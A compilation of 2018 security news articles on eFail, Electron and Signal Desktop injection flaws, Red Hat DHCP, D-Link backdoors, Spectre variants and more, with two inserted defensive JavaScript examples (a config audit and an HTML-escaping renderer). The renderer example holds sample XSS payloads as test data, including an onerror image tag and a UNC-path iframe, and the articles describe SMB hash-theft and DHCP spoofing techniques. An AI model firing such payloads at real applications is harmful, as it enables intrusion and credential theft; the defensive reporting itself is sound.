- Vulnerability -

Last update 09.10.2017 13:51:50




Critical Flaws in PGP and S/MIME Tools Can Reveal Encrypted Emails in Plaintext
25.5.2018 thehackernews 
Note: the technical details of the vulnerabilities introduced in this article have now been released, so you should also read our latest article to learn how the eFail attack works and what users can do to protect themselves.
An important warning for people using widely used email encryption tools—PGP and S/MIME—for sensitive communication.
A team of European security researchers has released a warning about a set of critical vulnerabilities discovered in PGP and S/MIME encryption tools that could reveal your encrypted emails in plaintext.
What's worse? The vulnerabilities also impact encrypted emails you sent in the past.
PGP, or Pretty Good Privacy, is an open end-to-end encryption standard used to encrypt emails so that no third party, whether a service provider, a government or a criminal, can read your communication.
S/MIME, Secure/Multipurpose Internet Mail Extensions, is an asymmetric cryptography-based technology that allows users to send digitally signed and encrypted emails.
Sebastian Schinzel, professor of computer security at Münster University of Applied Sciences, took to Twitter to warn users of the issue, saying that "there are currently no reliable fixes for the vulnerability."
The Electronic Frontier Foundation (EFF) has also confirmed the existence of the as-yet undisclosed vulnerabilities and recommended that users uninstall PGP and S/MIME applications until the flaws are patched.
"EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages," the organisation said in its blog post.
"Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email."
So, until the vulnerabilities are patched, users are advised to stop sending and, especially, reading PGP-encrypted emails for now, and to use alternative end-to-end encrypted tools, such as Signal.
EFF has warned users to immediately disable the following plugins/tools for managing encrypted emails, if they have them installed:
Thunderbird with Enigmail
Apple Mail with GPGTools
Outlook with Gpg4win
It should be noted that the researchers have not claimed that the flaws reside in the encryption algorithms themselves; instead, the issues lie in the way the email decryption tools and plugins work.
The full technical details of the vulnerabilities will be released in a paper on Tuesday at 7 am UTC (3 am Eastern, midnight Pacific time).
Stay Tuned to The Hacker News for further details on the vulnerabilities.


Simple bug could lead to RCE flaw on apps built with Electron Framework
25.5.2018 thehackernews 
A critical remote code execution vulnerability has been discovered in the popular Electron web application framework that could allow attackers to execute malicious code on victims' computers.
Electron is an open source app development framework that powers thousands of widely used desktop applications, including WhatsApp, Skype, Signal, WordPress, Slack, GitHub Desktop, Atom, Visual Studio Code, and Discord.
Besides its own modules, Electron framework also allows developers to create hybrid desktop applications by integrating Chromium and Node.js framework through APIs.
Since Node.js is a runtime built for server-side applications, access to its APIs gives an Electron app far more reach into the underlying operating system (file system, processes, network) than a web page in a browser would have, which is exactly what makes a renderer compromise dangerous.
To keep untrusted web content away from Node.js APIs, Electron lets developers set "nodeIntegration" to false in a window's "webPreferences" options; when "webviewTag" is not declared, it defaults to the value of "nodeIntegration", so disabling Node integration is also supposed to disable the <webview> tag.
These preferences are fixed by the main process when the window is created, so script running in the renderer, for example script injected through a cross-site scripting (XSS) flaw, is not supposed to be able to change them at runtime.
Moreover, an app developer who omits "webviewTag: false" is still supposed to be protected, because the undeclared value is derived from "nodeIntegration" and is therefore treated as false.

However, Trustwave researcher Brendan Scarvell has released proof-of-concept (PoC) code that an attacker can inject, via a cross-site scripting flaw, into a targeted application running without "webviewTag" declared, and thereby achieve remote code execution.
The exploit re-enables "nodeIntegration" at runtime in a window opened from the compromised renderer, allowing attackers to run arbitrary system commands on the victim's machine with the privileges of the application.
The exploit does not work if the developer has also opted for one of the following:
the nativeWindowOpen option enabled in its webPreferences;
intercepting new-window events and overriding event.newGuest without reusing the supplied options object.
The vulnerability, tracked as CVE-2018-1000136, was reported to the Electron team by Scarvell earlier this year and affected all versions of Electron at the time of discovery.
Electron developers patched the vulnerability in March 2018 with the release of versions 1.7.13, 1.8.4, and 2.0.0-beta.4.
So, app developers should ensure their applications are patched, or at least not vulnerable to this issue.
For more technical details on the Electron vulnerability and PoC exploit code, you can head on to the Trustwave's blog post.
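The following is an added example, not code from Electron, Trustwave or the article, that turns the exposure conditions described above into a configuration audit: it reports whether a window's webPreferences leave the window.open()/webview path open, produces a hardened copy with every relevant option declared explicitly, and shows a new-window handler that builds the guest window itself instead of reusing the options Electron supplies. The option names nodeIntegration, webviewTag and nativeWindowOpen and the new-window/event.newGuest mechanism are Electron's, as referenced in the article; the treatment of an undeclared nodeIntegration as enabled is an assumption about the framework's default at the time, and the BrowserWindow constructor is injected so the file runs under plain Node.

```javascript
'use strict';

// Added example, not Electron's or Trustwave's code. Encodes the exposure
// conditions for the webview re-enable bypass as a config audit and shows the
// two mitigations the article lists. Runs under plain Node; Electron itself is
// only needed to actually create windows.

// Verdict for one BrowserWindow's webPreferences. `handlesNewWindow` must be true
// only when the app intercepts 'new-window', calls event.preventDefault() and
// creates the guest window itself WITHOUT passing the supplied options through.
function auditWebPreferences(webPreferences, { handlesNewWindow = false } = {}) {
  const prefs = webPreferences || {};
  // Assumption: an undeclared nodeIntegration counts as enabled (the Electron
  // default at the time). Such a renderer needs no bypass; XSS is already RCE.
  if (prefs.nodeIntegration !== false) {
    return { exposed: true, reason: 'nodeIntegration is not disabled' };
  }
  if (prefs.webviewTag === false) {
    return { exposed: false, reason: 'webviewTag declared false' };
  }
  if (prefs.nativeWindowOpen === true) {
    return { exposed: false, reason: 'nativeWindowOpen enabled' };
  }
  if (handlesNewWindow) {
    return { exposed: false, reason: 'new-window intercepted with fresh options' };
  }
  return {
    exposed: true,
    reason: 'webviewTag undeclared: a window.open() child can re-enable Node integration',
  };
}

// Hardened copy of a webPreferences object: declare every relevant option
// explicitly instead of relying on implicit defaults.
function hardenWebPreferences(webPreferences) {
  return Object.assign({}, webPreferences, {
    nodeIntegration: false,
    webviewTag: false,
    nativeWindowOpen: true,
  });
}

// 'new-window' handler that ignores the inherited `options` argument and builds
// the guest with hardened preferences. The BrowserWindow constructor is injected
// so this file runs outside Electron; in an app, pass require('electron').BrowserWindow
// and register with win.webContents.on('new-window', makeNewWindowHandler(BrowserWindow)).
function makeNewWindowHandler(BrowserWindowCtor) {
  return function onNewWindow(event, url, frameName, disposition, options) {
    event.preventDefault();
    const guest = new BrowserWindowCtor({
      show: true,
      webPreferences: hardenWebPreferences({}), // deliberately not options.webPreferences
    });
    guest.loadURL(url);
    event.newGuest = guest;
  };
}

// Constructed sample: the configuration pattern the article describes as exposed,
// audited before and after hardening.
const sampleAppPrefs = { nodeIntegration: false };
console.log(auditWebPreferences(sampleAppPrefs));
console.log(auditWebPreferences(hardenWebPreferences(sampleAppPrefs)));
```

Run the audit against every BrowserWindow configuration in an app and treat an `exposed: true` verdict on a pre-patch Electron version (before 1.7.13, 1.8.4 or 2.0.0-beta.4) as a defect to fix, not a warning.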
It should also be noted that the Electron bug has nothing to do with the recently disclosed flaw in the Signal desktop app, which also patched a critical cross-site scripting (code injection) vulnerability; its full technical details are scheduled to be published exclusively on The Hacker News this evening. Stay tuned!


Adobe Releases Critical Security Updates for Acrobat, Reader and Photoshop CC
25.5.2018 thehackernews 
Adobe has just released new versions of Acrobat DC, Acrobat Reader DC and Photoshop CC for Windows and macOS that patch 48 vulnerabilities.
A total of 47 vulnerabilities affect Adobe Acrobat and Reader, and one critical remote code execution flaw has been patched in Adobe Photoshop CC.
Of the 47 Acrobat and Reader flaws, 24 are rated critical and fall into the classes double free, heap overflow, use-after-free, out-of-bounds write, type confusion and untrusted pointer dereference; if exploited, they could allow arbitrary code execution in the context of the targeted user.
The remaining 23 flaws, including security bypass, out-of-bounds read, memory corruption, NTLM SSO hash theft and HTTP POST newline injection via XFA submission, are rated important and can lead to information disclosure or security bypass.



The above-listed vulnerabilities impact the Windows and macOS versions of Acrobat DC (Consumer and Classic 2015), Acrobat Reader DC (Consumer and Classic 2015), Acrobat 2017, and Acrobat Reader 2017.
The latest Acrobat and Reader patches carry Adobe's priority rating "1," which means the flaws are either being exploited in the wild or are considered likely to be. Users are therefore strongly recommended to update their software as soon as possible.
The flaws have been addressed in Acrobat DC and Acrobat Reader DC version 2018.011.20040, Acrobat 2017 and Acrobat Reader 2017 version 2017.011.30080, and Acrobat DC (Classic 2015) and Acrobat Reader DC (Classic 2015) version 2015.006.30418.
Security Patch for Adobe Photoshop CC
Adobe has also released security patches for the Windows and macOS versions of Photoshop CC to address a critical vulnerability, categorized as "out-of-bounds write" issue, which can be exploited to execute arbitrary code in the context of the current user.
The vulnerability (CVE-2018-4946) impacts Photoshop CC 2018 version 19.1.3 and earlier 19.x versions, as well as Photoshop CC 2017 version 18.1.3 and earlier 18.x versions.
The company credited researcher Giwan Go of Trend Micro's Zero Day Initiative for reporting the flaw, which has been addressed with the release of Photoshop CC 2018 version 19.1.4 and Photoshop CC 2017 version 18.1.4.
This update has been given a priority rating of "3," which means attackers have not been seen targeting the vulnerability.
Adobe recommends that end users and administrators install the latest security updates as soon as possible.


Hackers Reveal How Code Injection Attack Works in Signal Messaging App
25.5.2018 thehackernews 
After the revelation of the eFail attack details, it's time to reveal how the recently reported code injection vulnerability in the popular end-to-end encrypted Signal messaging app works.
As we reported last weekend, Signal has patched its messaging app for Windows and Linux that suffered a code injection vulnerability discovered and reported by a team of white-hat hackers from Argentina.
The vulnerability could have been exploited by remote attackers to inject a malicious payload inside the Signal desktop app running on the recipients' system just by sending them a specially crafted link—without requiring any user interaction.
According to a blog post published today, the researchers (Iván Ariel Barrera Oro, Alfredo Ortega and Juliano Rizzo) discovered the vulnerability by accident while chatting on Signal, when one of them shared a link to a vulnerable site with an XSS payload in its URL.
The XSS payload unexpectedly executed inside the Signal desktop app.

Cross-site scripting (XSS) is a common attack vector in which an attacker injects script or markup into content that a vulnerable web application renders.
After testing multiple XSS payloads to determine the scope of the issue, the researchers found that the vulnerability resides in the function responsible for handling shared links, allowing attackers to inject user-defined HTML/JavaScript via iframe, image, video and audio tags.
Using this vulnerability, attackers could even inject a form into the recipient's chat window, tricking them into revealing sensitive information through social engineering.
It had previously been speculated that the Signal flaw might have allowed attackers to execute system commands or gain sensitive information like decryption keys—but no, it is not the case.
The vulnerability was immediately patched by the Signal developers shortly after the proof-of-concept video was released by Ortega last weekend.

The researchers also found that a patch (regex function to validate URLs) for this vulnerability existed in previous versions of the desktop app, but it was somehow removed or skipped in the Signal update released on 10th April this year.
Now that the full details of the vulnerability are known, the issue appears less critical and dangerous than initially speculated.
So you can freely rely on Signal for encrypted communication without any worries. Just make sure the service is always up-to-date.


Red Hat Linux DHCP Client Found Vulnerable to Command Injection Attacks
25.5.2018 thehackernews 
A Google security researcher has discovered a critical remote command injection vulnerability in the DHCP client implementation of Red Hat Enterprise Linux and its derivatives, such as Fedora.
The vulnerability, tracked as CVE-2018-1111, could allow attackers to execute arbitrary commands with root privileges on targeted systems.
Whenever a system joins a network, its DHCP client obtains network configuration parameters, such as an IP address and DNS servers, from the Dynamic Host Configuration Protocol (DHCP) server.
The vulnerability resides in the NetworkManager integration script shipped with the DHCP client package, which applies the configuration the client obtains over DHCP.
Felix Wilhelm of the Google security team found that an attacker operating a malicious DHCP server, or sitting on the same network as the victim, can exploit this flaw by spoofing DHCP responses, ultimately running arbitrary commands as root on a victim system running the vulnerable DHCP client.
Although full details of the vulnerability have not been released, Wilhelm says his PoC exploit code is so short that it fits in a tweet.
Meanwhile, Barkın Kılıç, a security researcher from Turkey, has released a tweetable proof-of-concept exploit code for the Red Hat Linux DHCP client vulnerability on Twitter.

In its security advisory, Red Hat has confirmed that the vulnerability impacts Red Hat Enterprise Linux 6 and 7, and that all customers running affected versions of the dhclient package should update to the fixed packages as soon as they are available.
"Users have the option to remove or disable the vulnerable script, but this will prevent certain configuration parameters provided by the DHCP server from being configured on a local system, such as addresses of the local NTP or NIS servers," Red Hat warns.
Fedora has also released new versions of DHCP packages containing fixes for Fedora 26, 27, and 28.
Other popular Linux distributions, such as openSUSE and Ubuntu, do not appear to be impacted, because their DHCP client packages do not ship the NetworkManager integration script by default.


Another severe flaw in Signal desktop app lets hackers steal your chats in plaintext
25.5.2018 thehackernews 
For the second time in less than a week, users of the popular end-to-end encrypted Signal messaging app need to update their desktop applications to patch another severe code injection vulnerability.
Discovered on Monday by the same team of security researchers, the new vulnerability poses the same threat as the previous one: remote attackers can inject malicious code into the recipient's Signal desktop app just by sending them a message, with no user interaction required.
To understand more about the first code injection vulnerability (CVE-2018-10994), you can read our previous article covering how the researchers found the Signal flaw and how it works.
The only difference between the two is that the previous flaw resides in the function that handles links shared in the chat, whereas the new vulnerability (CVE-2018-11101) exists in a different function that handles the validation of quoted messages, i.e., quoting a previous message in a reply.

In other words, to exploit the newly patched bug on vulnerable versions of the Signal desktop app, all an attacker needs to do is send malicious HTML/JavaScript code as a message to the victim, and then quote or reply to that same message with any text.
When the victim's vulnerable Signal desktop app receives the quoted message containing the malicious payload, it executes the payload automatically, without any user interaction.
Exploiting Signal Code Injection to Steal Plaintext Chats

Until now, the proof-of-concept payloads used to demonstrate code injection in Signal were limited to embedding an HTML iframe or image/video/audio tags in the victim's desktop app.
However, the researchers have now crafted a new PoC exploit that could allow remote attackers to steal all of a victim's Signal conversations in plaintext just by sending them a message.
This attack defeats the purpose of an end-to-end encrypted messaging app, allowing remote attackers to get hold of users' plaintext conversations without breaking the encryption.
Attackers Could Possibly Steal Windows Password As Well
What's worse?
In their blog post, the researchers also indicated that an attacker could include files from a remote SMB share using an HTML iframe, which could be abused to steal NTLMv2 password hashes from Windows users.
"In the Windows operating system, the CSP fails to prevent remote inclusion of resources via the SMB protocol. In this case, remote execution of JavaScript can be achieved by referencing the script in an SMB share as the source of an iframe tag, for example: <iframe src=\\DESKTOP-XXXXX\Temp\test.html> and then replying to it," the researchers explain.
Though they haven't claimed anything about this form of attack, I speculate that if an attacker can exploit the code injection to force the Windows OS to initiate automatic authentication with an attacker-controlled SMB server using single sign-on, it would eventually hand over the victim's username and NTLMv2 hashed password to the attackers, potentially allowing them to gain access to the victim's system.
We have seen how the same attack technique was recently exploited using a vulnerability in Microsoft Outlook, disclosed last month.
I cannot verify this claim at the moment, but we are in contact with a few security researchers to confirm it.
Researchers—Iván Ariel Barrera Oro, Alfredo Ortega, Juliano Rizzo, and Matt Bryant—responsibly reported the vulnerability to Signal, and its developers have patched the vulnerability with the release of Signal desktop version 1.11.0 for Windows, macOS, and Linux users.
However, The Hacker News has learned that Signal's developers had already identified this issue as part of a comprehensive fix for the first vulnerability, before the researchers found and reported it.
Signal has an auto-update mechanism, so most users should already have the update installed. You can read this guide to check that you are running an updated version of Signal.
If you are not, update Signal Desktop immediately, since the vulnerability poses a severe risk of exposing your private conversations in plaintext to attackers, with further serious consequences.
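Both Signal articles above describe the same root cause: message text, shared links and quoted messages reached the renderer as live HTML instead of as text. The following is an added example, not Signal's code, of the rendering discipline that closes both paths: every token of untrusted text is HTML-escaped, only absolute http(s) URLs are turned into links (so javascript:, file: and UNC paths like the \\DESKTOP-XXXXX\Temp\test.html iframe source in the researchers' quote stay inert), and quoted replies go through exactly the same renderer. The function names, the constructed sample payloads and the CSP string are this example's own assumptions; it runs under plain Node.

```javascript
'use strict';

// Added example, not Signal's code: render untrusted chat text so that markup in
// the body, in a shared link, or in a quoted message is displayed literally, and
// only http(s) links become anchors. Runs under plain Node (uses the global URL).

function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Only absolute http/https URLs may become clickable. javascript:, file:, data:
// and UNC paths such as \\DESKTOP-XXXXX\Temp\test.html are rejected: the WHATWG
// parser either reports a non-http scheme or refuses to parse them at all.
function isSafeLinkUrl(candidate) {
  let url;
  try {
    url = new URL(candidate);
  } catch (e) {
    return false;
  }
  return url.protocol === 'http:' || url.protocol === 'https:';
}

// Split on whitespace (keeping the separators), escape every token, and wrap the
// tokens that are safe URLs in an anchor. No raw input ever reaches the output.
const URL_TOKEN = /^https?:\/\/\S+$/i;
function renderMessageHtml(text) {
  return String(text)
    .split(/(\s+)/)
    .map((token) => {
      if (URL_TOKEN.test(token) && isSafeLinkUrl(token)) {
        const safe = escapeHtml(token);
        return `<a href="${safe}" rel="noopener noreferrer" target="_blank">${safe}</a>`;
      }
      return escapeHtml(token);
    })
    .join('');
}

// A reply that quotes an earlier message uses the same renderer for both parts;
// the second Signal bug was a quote path that skipped validation.
function renderQuotedReply(quotedText, replyText) {
  return `<blockquote>${renderMessageHtml(quotedText)}</blockquote>` +
         `<p>${renderMessageHtml(replyText)}</p>`;
}

// Defence in depth for the renderer (assumption: the app needs no remote frames
// or inline script). The researchers report that on Windows a CSP alone did not
// stop SMB-sourced frames, so the escaping above remains the primary control.
const RENDERER_CSP =
  "default-src 'self'; script-src 'self'; frame-src 'none'; object-src 'none'";

// Constructed sample payloads modelled on the article's description.
const SAMPLE_MESSAGES = [
  '<iframe src=\\\\DESKTOP-XXXXX\\Temp\\test.html>',
  '<img src=x onerror=alert(1)>',
  'see https://example.com/report?id=1',
];
for (const message of SAMPLE_MESSAGES) {
  console.log(renderQuotedReply(message, 'quoting this'));
}
console.log(RENDERER_CSP);
```

The important property is that there is exactly one path from untrusted text to the DOM and it is escape-first; link detection operates on the already-tokenised text and can only ever add an anchor around a string that the URL parser has accepted as http(s).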


Vulnerabilities Found in RTUs Used by European Energy Firms
24.5.2018 securityweek 

Several critical and high severity vulnerabilities have been found in remote terminal unit (RTU) modules designed for the energy sector and used in various European countries.

Bernhards Blumbergs and Arturs Danilevics of Latvia’s CERT.LV discovered that Telem-GW6 and Telem-GWM products made by Estonia-based Martem are affected by vulnerabilities that can be exploited to cause a denial-of-service (DoS) condition and execute arbitrary code and commands.

Martem, which specializes in telecontrol systems for supervising and controlling electrical distribution networks, says its clients are electrical distribution firms, and industrial and transportation companies that operate their own electrical networks. Martem's main customers are located in Estonia, Lithuania, Latvia and Finland.

The company said its RTUs were used earlier this year in a cyber defense exercise organized by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE).

The vulnerable products are data concentrators that collect data from peripheral devices in the substation. The RTUs impacted by the security holes found by Blumbergs and Danilevics are GW6 version 2018.04.18-linux_4-01-601cb47 and prior, and GWM version 2018.04.18-linux_4-01-601cb47 and prior.

The most serious of the flaws, with a CVSS score of 10, is CVE-2018-10603, which allows a rogue node on the network to send unauthorized commands and take control of the industrial process. The vulnerability is caused by the lack of authentication for commands using IEC-104, a protocol standard for telecontrol, teleprotection and telecommunications for electric power systems.

Another security hole, rated “high severity” and tracked as CVE-2018-10607, has been classified as an uncontrolled resource consumption issue. According to ICS-CERT, a DoS condition can be caused within the industrial process control channel by creating new connections to one or more input/output accessories (IOAs) and not closing them properly.


The last vulnerability, tracked as CVE-2018-10609 and also classified as “high severity,” is a cross-site scripting (XSS) bug that can be exploited to execute arbitrary code on the client side with the privileges of the targeted user.

According to ICS-CERT, the vulnerabilities can be exploited remotely even by an attacker with a low skill level.

The vendor says the XSS flaw will be patched with the release of firmware version 2.0.73, which is expected to become available sometime after May 23. Attacks can also be prevented by disabling the web server if it’s not needed, or protecting the web server with a strong password to avoid unauthorized access.

The other two vulnerabilities can be mitigated through configuration changes, including using VPNs, using a firewall for packet filtering, and configuring the RTU so that only trusted systems can send commands.


Kaspersky discovered a backdoor account and other issues in D-Link DIR-620 Routers
24.5.2018 securityaffairs

Security experts from Kaspersky have discovered a backdoor account and three other vulnerabilities in D-Link DIR-620 routers.
Researchers from Kaspersky Lab have uncovered a backdoor account (CVE-2018-6213) in the firmware of D-Link DIR-620 routers that could be exploited by attackers to access the device's web panel and take over devices exposed online.

“The latest versions of the firmware have hardcoded default credentials that can be exploited by an unauthenticated attacker to gain privileged access to the firmware and to extract sensitive data, e.g., configuration files with plain-text passwords.” reads the blog post published by Kaspersky.

“The vulnerable web interface allows an unauthenticated attacker to run arbitrary JavaScript code in the user environment and run arbitrary commands in the router’s operating system (OS).”

To prevent abuse, the experts did not disclose the credentials for the backdoor account.

D-Link DIR-620 rev-F1

The bad news is that it is impossible to disable the backdoor account, the only way to mitigate the issue is to avoid exposing the admin panel online.

The firmware version containing the backdoor account is 1.0.37.

Kaspersky researchers have discovered three other vulnerabilities in the firmware of the D-Link DIR-620 routers. The remaining issues are:

CVE-2018-6210 – Hardcoded default credentials for Telnet.
CVE-2018-6211 – OS command injection
CVE-2018-6212 – Weakness in user data validation (reflected cross-site scripting)
Fortunately, there aren’t many D-Link DIR-620 devices exposed online because it is an old model.

The flawed devices were distributed by ISPs in Russia, the CIS and Eastern Europe (most of them in Russia); Kaspersky has already reported the flaws to the ISPs.


D-Link was notified of the vulnerabilities but said it will not issue firmware updates to address them.

To mitigate the issues Kaspersky recommends:

Restrict any access to the web dashboard using a whitelist of trusted IPs
Restrict any access to Telnet
Regularly change your router admin username and password


VMware Patches Fusion, Workstation Vulnerabilities
23.5.2018 securityweek

VMware informed customers on Monday that updates for its Fusion and Workstation products patch important denial-of-service (DoS) and privilege escalation vulnerabilities.

According to VMware, Fusion 10.x on macOS is impacted by a signature bypass flaw that can be exploited for local privilege escalation. The security hole, tracked as CVE-2018-6962, was discovered by a researcher from Chinese company Ant Financial. The issue has been fixed with the release of VMware Fusion 10.1.2.

VMware also revealed that Workstation 14.x on any platform and Fusion 10.x on macOS are impacted by several DoS vulnerabilities.
"VMware Workstation and Fusion contain multiple denial-of-service vulnerabilities that occur due to NULL pointer dereference issues in the RPC handler. Successful exploitation of these issues may allow an attacker with limited privileges on the guest machine to trigger a denial of service of their guest machine," the company said in its advisory.

The flaw, identified as CVE-2018-6963, was reported to VMware by Hahna Latonick and Kevin Fujimoto through Trend Micro's Zero Day Initiative (ZDI), and independently by Bruno Botelho. The issue was addressed with the release of Workstation 14.1.2 and Fusion 10.1.2.

ZDI has yet to publish its advisories for the vulnerabilities found by Latonick and Fujimoto, but the company’s site shows that the issues were reported in mid-April.

VMware on Monday also published an advisory describing the impact of a recently uncovered speculative execution attack method on its products.

Researchers disclosed the details of two new issues, related to the Meltdown and Spectre attacks, that have been dubbed Variant 3a and Variant 4.

VMware says Variant 4, tracked as CVE-2018-3639, affects vSphere, Workstation and Fusion. Updates for these products enable Hypervisor-Assisted Guest mitigations for this vulnerability.

“vCenter Server, ESXi, Workstation, and Fusion update speculative execution control mechanism for Virtual Machines (VMs). As a result, a patched Guest Operating System (GOS) can remediate the Speculative Store bypass issue (CVE-2018-3639) using the Speculative-Store-Bypass-Disable (SSBD) control bit. This issue may allow for information disclosure in applications and/or execution runtimes which rely on managed code security mechanisms. Based on current evaluations, we do not believe that CVE-2018-3639 could allow for VM to VM or Hypervisor to VM Information disclosure,” VMware said.

Earlier this month, the company published an advisory informing customers that VMware NSX SD-WAN Edge by VeloCloud contains an unauthenticated command injection vulnerability. While the issue is potentially serious as it allows remote code execution, it has been assigned a severity rating of “important” as the impacted component is not enabled by default and it will be removed in future releases.


Critical Flaw Impacts Dell EMC RecoverPoint
23.5.2018 securityweek

Several security flaws were recently found in Dell EMC RecoverPoint, including a Critical remote code execution vulnerability, security firm Foregenix reveals.

Researchers from Foregenix found a total of six security issues impacting all versions of Dell EMC RecoverPoint prior to 5.1.2, as well as RecoverPoint for Virtual Machines prior to 5.1.1.3.

The flaws were reported to Dell in February, but the company released an update only last week, and that update addressed only some of the bugs. The fixes are available through Dell EMC support.

Of the six vulnerabilities, only three received CVE numbers to date. These include CVE-2018-1235 (CVSS 9.8, Critical severity), CVE-2018-1242 (CVSS 6.7, Medium severity), and CVE-2018-1241 (CVSS 6.2, Medium severity).

The most important of the issues allows an unauthenticated remote attacker to execute arbitrary code with root privileges via an unspecified attack vector.

“The critical vulnerability allows unauthenticated remote code execution with root privileges. This means that if an attacker with no knowledge of any credentials has visibility of RecoverPoint on the network, or local access to it, they can gain complete control over the RecoverPoint and its underlying Linux operating system,” Foregenix reveals.

The security researchers note that, once they gained complete control over the impacted device, they could exploit other unpatched vulnerabilities “to pivot and gain control of the Microsoft Active Directory network that the RecoverPoints were integrated with.”

The second newly discovered flaw is an administrative menu arbitrary file read, which could allow an attacker with access to the boxmgmt administrative menu to read files from the file system (which are accessible to the boxmgmt user).

In certain conditions, RecoverPoint leaks plaintext Lightweight Directory Access Protocol credentials into the Tomcat log file, the security firm says.

“When the LDAP server is not contactable by RecoverPoint, and a log in attempt is made to an LDAP linked account via a RecoverPoint web interface, LDAP credentials are leaked into the tomcat.log file. These credentials may remain in the log file indefinitely, providing opportunity for attackers with access to the RecoverPoint file system to obtain them and resulting in LDAP account compromise,” Foregenix notes.

The researchers also discovered that RecoverPoint ships with "root" password hashes for grub stored in /distribution.log, a file readable by any user. A CVE was initially issued for the flaw, but Dell apparently revoked it, claiming the file would be readable only by root; the researchers, however, say they could read the file as the www-data user.

Although the CVE was revoked, Dell did fix the flaw for new installations of RecoverPoint. “At the time of writing it was not clear whether the vendor would reinstate the CVE, or whether performing an upgrade would remove the hash from previous versions of the world-readable log file,” Foregenix says.

RecoverPoint was also found to use a hardcoded root password that the user cannot change unless they contact the vendor. An attacker knowing the password could “gain control over all of the devices by logging in at the local console, or gaining console access as an unprivileged user, and changing to root.”

A CVE was not issued for the vulnerability, but the vendor apparently said that a documentation update will make it clear that a dedicated script from the support team is necessary to change the password.

The sixth vulnerability resides in an insecure configuration option that results in LDAP credentials being sent by the RecoverPoint in clear text, thus potentially exposing them to eavesdroppers.

“When the LDAP simple bind configuration is used, credentials are sent from the RecoverPoint server in cleartext. This means that a man-in-the-middle attacker or an attacker who has gained access to the RecoverPoint using another vulnerability, can monitor the traffic and discover LDAP credentials which have been entrusted to the RecoverPoint,” Foregenix says.

The RecoverPoint documentation includes a warning about the insecure configuration, but the RecoverPoint menu itself does not include such an alert.


Tech Firms Coordinate Disclosure of New Meltdown, Spectre Flaws
22.5.2018 securityweek 

Intel, AMD, ARM, IBM, Microsoft and other major tech companies on Monday released updates, mitigations and advisories for two new variants of the speculative execution attack methods known as Meltdown and Spectre.

In January, researchers from several organizations warned that processors from Intel, AMD, ARM and other companies are affected by vulnerabilities that allow malicious applications to bypass memory isolation mechanisms and gain access to sensitive data.

Spectre attacks are possible due to CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2), while Meltdown attacks are possible due to CVE-2017-5754 (Variant 3). Researchers at Google Project Zero and Microsoft recently identified a new method which they have dubbed Variant 4.

Variant 4 relies on a side-channel vulnerability known as Speculative Store Bypass (SSB) and has been assigned the identifier CVE-2018-3639. Companies have also shared details on Variant 3a, a Rogue System Register Read issue tracked as CVE-2018-3640. Variant 3a was documented by ARM back in January, but it went largely unnoticed.

A German magazine reported in early May that Intel and others had been working on patches for several new Spectre flaws dubbed “Spectre-NG.” Reports claimed the new variants may be more serious and easier to exploit, but none of the impacted vendors appear too concerned about the new findings, in most cases assigning medium/moderate/important severity ratings.

Microsoft is still analyzing its products, but so far it has not identified any code in its software or cloud service infrastructure that allows exploitation of Variant 4. The company says its previous Meltdown and Spectre mitigations should address this variant as well, and noted that “Microsoft Edge, Internet Explorer, and other major browsers have taken steps to increase the difficulty of successfully creating a side channel.”

As for Variant 3a, Microsoft says “the mitigation for this vulnerability is exclusively through a microcode/firmware update, and there is no additional Microsoft Windows operating system update.”

Intel has already developed microcode patches that should address both Variant 3a and Variant 4. Beta versions have been provided to OEMs and operating system vendors, and BIOS and software updates are expected to become available in the coming weeks.

“[The mitigation for Variant 4] will be set to off-by-default, providing customers the choice of whether to enable it. We expect most industry software partners will likewise use the default-off option,” said Leslie Culbertson, executive vice president and general manager of Product Assurance and Security at Intel.

If the mitigation is enabled, there may be a negative impact on performance of roughly 2-8 percent, the chipmaker says.

AMD says it has not identified any products vulnerable to Variant 3a, and that patches for Variant 4 should be expected from Microsoft and Linux distributions.

IBM has released both operating system and firmware updates to patch Variant 4 in its Power Systems clients.

The list of other organizations that published advisories and blog posts for Variant 3a and Variant 4 includes Red Hat, VMware, Oracle, Cisco, Xen, Ubuntu, Suse, CERT/CC and US-CERT.

Several other side-channel attack methods have been identified since the initial disclosure of Spectre and Meltdown, including those dubbed BranchScope, SgxPectre, MeltdownPrime and SpectrePrime. The most recently discovered method has allowed researchers to gain access to the highly privileged System Management Mode (SMM) memory.


TheMoon botnet is now leveraging a zero-day to target GPON routers

22.5.2018 securityaffairs Vulnerebility

Security experts from Qihoo 360 Netlab discovered the operators behind the TheMoon botnet are now leveraging a zero-day exploit to target GPON routers.
Researchers from security firm Qihoo 360 Netlab reported that cybercriminals continue to target Dasan GPON routers: they recently spotted threat actors using another zero-day flaw affecting the same routers to recruit them into their botnet.

At the time of writing, there are no further details on the vulnerability exploited by attackers in the wild; Qihoo 360 Netlab experts only confirmed that the exploit code they tested worked on two models of GPON routers.

The security firm has refused to release further details on this flaw to prevent more attacks but said it was able to reproduce its effects.

Experts discovered that the operators behind the TheMoon botnet are now leveraging the zero-day exploit to target GPON routers. The activity of the TheMoon botnet was first spotted in 2014, and since 2017 its operators have added at least six IoT device exploits to the bot's code.

“A very special thing about this round is the attacking payload. It is different from all previous ones, so it looks like a 0day.” reads the analysis published by Netlab.

“And we tested this payload on two different versions of GPON home router, all work. All these make TheMoon totally different, and we chose NOT to disclose the attack payload details.”


TheMoon is only the latest botnet targeting Dasan GPON routers: in a previous analysis shared by Netlab, the experts confirmed that the Hajime, Mettle, Mirai, Muhstik and Satori botnets have been exploiting CVE-2018-10561 and CVE-2018-10562 against the same models.

Netlab along with other security firms have managed to take down the C&C servers of the Muhstik botnet.

Although a large number of GPON routers are exposed online, only 240,000 have been compromised, likely because the exploit code used by the attackers was not able to infect the devices reliably.

Experts warn that the number of infected GPON routers could rapidly increase if other threat actors start exploiting the zero-day vulnerability.


Dell Patches Vulnerability in Pre-installed SupportAssist Utility
21.5.2018 securityweek 
Vulnerebility

Dell Patches Local Privilege Escalation in SupportAssist

Dell recently addressed a local privilege escalation (LPE) vulnerability in SupportAssist, a tool pre-installed on most new Dell devices running Windows.

